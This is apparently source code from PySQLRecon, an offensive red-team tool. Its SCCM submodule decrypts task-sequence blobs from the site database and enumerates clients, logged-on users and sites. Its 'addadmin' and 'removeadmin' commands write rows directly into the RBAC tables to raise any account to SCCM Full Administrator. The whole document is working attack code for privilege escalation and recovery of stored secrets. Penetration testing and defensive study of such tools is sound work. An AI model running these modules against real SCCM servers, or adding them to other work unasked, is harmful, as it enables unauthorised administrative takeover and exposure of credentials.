from Crypto.Cipher import DES3
from hashlib import sha1
import struct

from pysqlrecon.logger import logger


class SccmMixin:

    #
    # https://github.com/skahwah/SQLRecon/blob/main/SQLRecon/SQLRecon/modules/SCCM.cs#L844
    #
    @staticmethod
    def decode_data(encrypted_blob):

        data_len = struct.unpack_from('<I', encrypted_blob, 52)[0]
        encrypted_data = encrypted_blob[64:64 + data_len]
        logger.debug(f"Encrypted data length: {data_len}")

        hash_base = encrypted_blob[4:44]

        logger.debug(f"Hash Base: [ {', '.join([str(byte) for byte in hash_base])} ]")

        key = SccmMixin.aes_des_key_derivation(hash_base)[:24]
        logger.debug(f"Derived Key: [ {', '.join([str(byte) for byte in key])} ]")
        
        iv = bytes([0] * 8)
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        decrypted = cipher.decrypt(encrypted_data)

        # Remove PKCS7 padding
        padding_len = decrypted[-1]
        if isinstance(padding_len, int) and padding_len > 0 and padding_len <= 8:
            decrypted = decrypted[:-padding_len]

        try:
            decoded_string = decrypted.decode('utf-16-le')
        except UnicodeDecodeError as e:
            print(f"Decoding error: {e}")
            raise

        return decoded_string
    

    #
    # https://github.com/MWR-CyberSec/PXEThief/blob/main/media_variable_file_cryptography.py#L23
    #
    @staticmethod
    def aes_des_key_derivation(password):
        key_sha1 = sha1(password).digest()
        
        b0 = b""
        for x in key_sha1:
            b0 += bytes((x ^ 0x36,))
            
        b1 = b""
        for x in key_sha1:
            b1 += bytes((x ^ 0x5c,))

        # pad remaining bytes with the appropriate value
        b0 += b"\x36"*(64 - len(b0))
        b1 += b"\x5c"*(64 - len(b1))
            
        b0_sha1 = sha1(b0).digest()
        b1_sha1 = sha1(b1).digest()
        
        return b0_sha1 + b1_sha1
    

    @staticmethod
    def convert_sid_to_binary(sid_string):
        # Split the SID string into its components
        sid_parts = sid_string.split('-')
        
        # Extract the revision level (first part after 'S')
        revision = int(sid_parts[1])
        
        # Extract the identifier authority (next part)
        identifier_authority = int(sid_parts[2])
        
        # Extract the sub authorities (remaining parts)
        sub_authorities = [int(part) for part in sid_parts[3:]]

        # Create the binary representation
        # Start with revision and sub-authority count
        sid_binary = struct.pack('B', revision) + struct.pack('B', len(sub_authorities))
        
        # Handle identifier authority
        if identifier_authority > 0xFFFFFFFF:
            sid_binary += struct.pack('>Q', identifier_authority)[2:]
        else:
            sid_binary += b'\x00\x00' + struct.pack('>I', identifier_authority)

        # Add each sub authority
        for sub_authority in sub_authorities:
            sid_binary += struct.pack('<I', sub_authority)

        return sid_binary




import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "logons"
HELP = "[bright_black][NORM][/] Display SCCM clients and last logged on user [I]"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx:    typer.Context,
    user:   str = typer.Option(None, "--user", help="Filter by username (use % for wildcard)"),
    host:   str = typer.Option(None, "--host", help="Filter by hostname (use % for wildcard)")):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    if pysqlrecon.db == 'master':
        logger.warning("You likely need to specify the CM_[SITE] database")

    pysqlrecon.connect()

    logger.info("Querying clients and last logged on users")

    query = "select Name00, Username00 from [dbo].[Computer_System_DATA]"
    
    if user and host:
        query += f" where Username00 like '{user}' and Name00 like '{host}'"
    
    elif user:
        logger.debug(f"Filtering on user: {user}")
        query += f" where Username00 like '{user}'"
    
    elif host:
        logger.debug(f"Filtering on host: {host}")
        query += f" where Name00 like '{host}'"

    pysqlrecon.query_handler(query)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()
    



import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "removeadmin"
HELP = "[red][PRIV][/] Remove elevated account or elevated privileges [I]"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx:            typer.Context,
    id:             str = typer.Option(..., "--adminid", help="AdminID of the user to demote/remove"),
    permissions:    str = typer.Option("00000000|00000000", "--permissions", help="Permissions to remove (default will remove all permissions and account)")):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    if pysqlrecon.db == 'master':
        logger.warning("You likely need to specify the CM_[SITE] database")

    rm_account = True if "00000000|00000000" in permissions else False

    values = ''
    privs_added = False
    
    if "SMS00ALL|SMS0001R" in permissions or rm_account:
        values += f"(AdminID={id} and ScopeID = 'SMS00ALL' and RoleID = 'SMS0001R' and ScopeTypeID = '29')"
        privs_added = True

    if "SMS00004|SMS0001R" in permissions or rm_account:
        if privs_added:
            values += " or "
        values += f"(AdminID={id} and ScopeID = 'SMS00004' and RoleID = 'SMS0001R' and ScopeTypeID = '1')"
        privs_added = True

    if "SMS00001|SMS0001R" in permissions or rm_account:
        if privs_added:
            values += " or "
        values += f"(AdminID={id} and ScopeID = 'SMS00001' and RoleID = 'SMS0001R' and ScopeTypeID = '1')"

    if values == '':
        logger.warning("No permissions, or invalid permissions, specified")
        exit()
    
    pysqlrecon.connect()
    
    #
    # Remove permissions
    #
    logger.info(f"Removing permissions from AdminID {id}")
    query = "Delete from [dbo].[RBAC_ExtendedPermissions] where " + values
    logger.debug(f"Constructed delete privs statement: {query}")

    pysqlrecon.query_handler(query)
    if len(pysqlrecon.ms_sql.rows) > 0:
        logger.error("Failed to remove permissions")
        logger.error(pysqlrecon.get_last_resp())
        pysqlrecon.disconnect()
        exit()

    logger.info(f"Removed permissions from AdminID {id}")

    #
    # Remove account
    #
    if rm_account:
        query = f"Delete from [dbo].[RBAC_Admins] where AdminID={id}"
        pysqlrecon.query_handler(query)

        if len(pysqlrecon.ms_sql.rows) > 0:
            logger.error("Failed to remove account")
            logger.error(pysqlrecon.get_last_resp())
            pysqlrecon.disconnect()
            exit()
        
        logger.info(f"Removed account with AdminID {id}")

    pysqlrecon.disconnect()
    



import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "sites"
HELP = "[bright_black][NORM][/] Gather SCCM site info [I]"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    if pysqlrecon.db == 'master':
        logger.warning("You likely need to specify the CM_[SITE] database")
    
    pysqlrecon.connect()

    logger.info("Listing SCCM Sites")

    query = "select * from [dbo].[DPInfo]"
    
    pysqlrecon.query_handler(query)
    pysqlrecon.print_results(use_basic_tables)

    pysqlrecon.disconnect()


import typer

from pysqlrecon.modules.sccm import users, sites, credentials, logons, tasklist, taskdata, \
                                    addadmin, removeadmin

__all__ = [
    addadmin,
    credentials,
    logons,
    removeadmin,
    sites,
    taskdata,
    tasklist,
    users
]

COMMAND_NAME = "sccm"
HELP = "[blue][SUBM][/] Submodule for SCCM specific commands"


app = typer.Typer(add_completion=False,
    rich_markup_mode='rich',
    context_settings={'help_option_names': ['-h', '--help']},
    pretty_exceptions_show_locals=False
)

for command in __all__:
    app.add_typer(
        command.app,
        name=command.COMMAND_NAME,
        help=command.HELP
    )




import typer

from pysqlrecon.logger import logger
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "addadmin"
HELP = "[red][PRIV][/] Elevate an account to Full Administrator [I]"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(
    ctx:    typer.Context,
    user:   str = typer.Option(..., "--user", help="DOMAIN\\User to elevate"),
    sid:    str = typer.Option(..., "--sid", help="SID of the user to elevate")):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    if pysqlrecon.db == 'master':
        logger.warning("You likely need to specify the CM_[SITE] database")

    #
    # Validate username format
    #
    if "\\" not in user:
        logger.error("Please specify user in DOMAIN\\User format")
        exit()
    
    username = user.split("\\")[1]
    sms00all = False
    sms0004 = False
    sms0001 = False


    pysqlrecon.connect()

    logger.info(f"Elevating {user} to Full Administrator role")

    #
    # Get site code
    #
    query = "select ThisSiteCode from [dbo].[v_Identification]"
    
    logger.debug("Querying site code...")
    
    pysqlrecon.query_handler(query)
    site_code = pysqlrecon.get_last_resp(attr="ThisSiteCode")
    
    logger.debug(f"Site code: {site_code}")

    #
    # Check RBAC_Admins for existing entry 
    #
    logger.debug("Checking for existing entry in RBAC_Admins...")

    hex_sid = PySqlRecon.convert_sid_to_binary(sid).hex()
    query = f"Select AdminID, AdminSID, LogonName from [dbo].[RBAC_Admins] where AdminSID = 0x{hex_sid}"
    
    pysqlrecon.query_handler(query)

    res_count = len(pysqlrecon.ms_sql.rows)

    #
    # Too many entries found
    #
    if res_count > 1:
        logger.warning(f"{res_count} entries found for {user} in RBAC_Admins")
        logger.warning("Choose new user or delete an entry")
        pysqlrecon.disconnect()
        exit()
    #
    # One entry found, calc permissions to add
    #
    elif res_count == 1:
        logger.debug(f"Found 1 entry for {user} in RBAC_Admins")
        
        id = pysqlrecon.get_last_resp(attr="AdminID")
        logger.debug(f"Existing AdminID: {id}")
        
        query = f"select ScopeID,RoleID from [dbo].[RBAC_ExtendedPermissions] where AdminID = {id}"
        pysqlrecon.query_handler(query)
        
        for row in pysqlrecon.ms_sql.rows:
            if row['ScopeID'] == "SMS00ALL" and row['RoleID'] == "SMS0001R":
                sms00all = True
            if row['ScopeID'] == "SMS00004" and row['RoleID'] == "SMS0001R":
                sms0004 = True
            if row['ScopeID'] == "SMS00001" and row['RoleID'] == "SMS0001R":
                sms0001 = True

        if sms00all and sms0004 and sms0001:
            logger.warning(f"{user} already has Full Administrator permissions")
            pysqlrecon.disconnect()
            exit()

        existing_privs = ""
        if sms00all : existing_privs += "SMS00ALL|SMS0001R,"
        if sms0004  : existing_privs += "SMS00004|SMS0001R,"
        if sms0001  : existing_privs += "SMS00001|SMS0001R,"

        if existing_privs != "":
            logger.info(f"Restore original permissions with pysqlrecon [OPTIONS] sccm removeadmin --adminid {id} --permissions '{existing_privs[:-1]}'")

    #
    # No entries found, add new entry
    #
    elif res_count == 0:
        logger.debug(f"No entries found for {user} in RBAC_Admins")
        logger.info("Adding new entry...")

        query = "INSERT INTO RBAC_Admins(AdminSID,LogonName,DisplayName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) " \
                f"VALUES (0x{hex_sid},'{user}','{username}',0,0,'','','','','{site_code}')"

        pysqlrecon.query_handler(query)

        #
        # Ensure user was added and get AdminID for removal command
        #
        logger.info("Checking if user was added...")
        query = f"Select AdminID from [dbo].[RBAC_Admins] where AdminSID = 0x{hex_sid}"
        pysqlrecon.query_handler(query)

        if len(pysqlrecon.ms_sql.rows) == 0:
            logger.error("Failed to add user")
            pysqlrecon.disconnect()
            exit()

        id = pysqlrecon.get_last_resp(attr="AdminID")
        logger.info(f"User added with ID: {id}")
        logger.info(f"Remove with pysqlrecon [OPTIONS] sccm removeadmin --adminid {id} --permissions '00000000|00000000'")

    #
    # Add permissions
    #
    logger.info("Adding permissions...")
    permissions = ''
    if not sms00all : permissions += f"({id}, 'SMS0001R', 'SMS00ALL', '29'),"
    if not sms0004  : permissions += f"({id}, 'SMS0001R', 'SMS00004', '1'),"
    if not sms0001  : permissions += f"({id}, 'SMS0001R', 'SMS00001', '1'),"
    
    permissions = permissions[:-1]
    
    query = "INSERT INTO [dbo].[RBAC_ExtendedPermissions] (AdminID,RoleID,ScopeID,ScopeTypeID) Values " + permissions
    logger.debug(f"Constructed add privs statement: {query}")

    pysqlrecon.query_handler(query)

    logger.info(f"User {user} should be elevated to Full Administrator in SCCM")

    pysqlrecon.disconnect()
    



import typer

from pysqlrecon.logger import logger, console
from pysqlrecon.lib import PySqlRecon

app = typer.Typer()
COMMAND_NAME = "taskdata"
HELP = "[bright_black][NORM][/] Decrypt task sequences [I]"
LINK_COMPATIBLE = False
IMPERSONATE_COMPATIBLE = True


@app.callback(invoke_without_command=True)
def main(ctx: typer.Context):
    
    pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']
    use_basic_tables = ctx.obj['basic_tables']

    # verify opts are compatible with module before connecting
    if not PySqlRecon.validate_opts(
        LINK_COMPATIBLE,
        IMPERSONATE_COMPATIBLE,
        pysqlrecon.link,
        pysqlrecon.impersonate
    ):
        exit()

    if pysqlrecon.db == 'master':
        logger.warning("You likely need to specify the CM_[SITE] database")
    
    pysqlrecon.connect()

    logger.info("Gathering encrypted task sequence blobs")

    query = "select PkgID, Name, Sequence from [dbo].[vSMS_TaskSequencePackage]"
    
    pysqlrecon.query_handler(query)
    
    if len(pysqlrecon.ms_sql.rows) == 0:
        logger.warning("No results found")
        return
    
    logger.info(f"Found {len(pysqlrecon.ms_sql.rows)} task sequences")
    
    #
    # Expecting PkgID | Name | Sequence
    # 
    for row in pysqlrecon.ms_sql.rows:
        logger.info(f"Task Sequence ID: {row['PkgID']}")
        logger.info(f"Task Sequence Name: \"{row['Name']}\"")

        # convert hex to byte list
        hex_str = row['Sequence'].decode('ascii')
        encrypted_blob = bytes.fromhex(hex_str).decode('ascii')
        logger.debug("Decrypting blob...")
        xml_task = pysqlrecon.decode_data(bytes.fromhex(encrypted_blob))

        console.print()
        console.print(xml_task)
        console.print()

    pysqlrecon.disconnect()